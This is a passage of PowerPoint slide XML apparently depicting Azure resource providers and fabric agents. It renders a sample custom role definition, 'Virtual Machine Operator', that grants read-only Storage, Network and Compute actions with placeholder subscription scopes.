          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044261" y="2105091"/>
            <a:ext cx="2529618" cy="581095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft.Storage RP</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FA112348-3B8A-49EF-993D-420F43E18649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019285" y="2099609"/>
            <a:ext cx="2529618" cy="581095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft.Compute RP</a:t>
            </a:r>
            <a:endPar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E887724A-1B33-4B32-9604-6AA7D0F997E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9518969" y="5132262"/>
            <a:ext cx="1075745" cy="301511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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1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Fabric Agent</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="11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FC0DCE6F-056F-4BDE-A12D-57038FB4B688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6072975" y="5139936"/>
            <a:ext cx="1075745" cy="301511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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1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Fabric Agent</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="1"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95287DA4-8BA6-4FF4-9B35-AA87D0266909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2081177" y="284552"/>
            <a:ext cx="1336723" cy="1045386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Connector: Elbow 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81581CF2-1143-45C3-8711-9C6FEC2F0DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4052479" y="1687362"/>
            <a:ext cx="2556595" cy="1099"/>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F75CEFB-D735-4E8C-9B23-0FB1AEEB6A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684156" y="2749883"/>
            <a:ext cx="4052305" cy="31085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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Name"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="14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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Virtual Machine Operator"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Id"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="14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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"88888888-8888-8888-8888-888888888888"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IsCustom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="14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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07704A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Description"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"Actions"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft.Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/*/read"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft.Network</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/*/read"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft.Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/*/read"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NotActions</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DataActions</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NotDataActions</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regula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400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AssignableScopes</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: [ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"/subscriptions/{subscriptionId1}"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"/subscriptions/{subscriptionId2}"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="SFMono-Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,]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rrow: Down 11">
            <a:extLst>
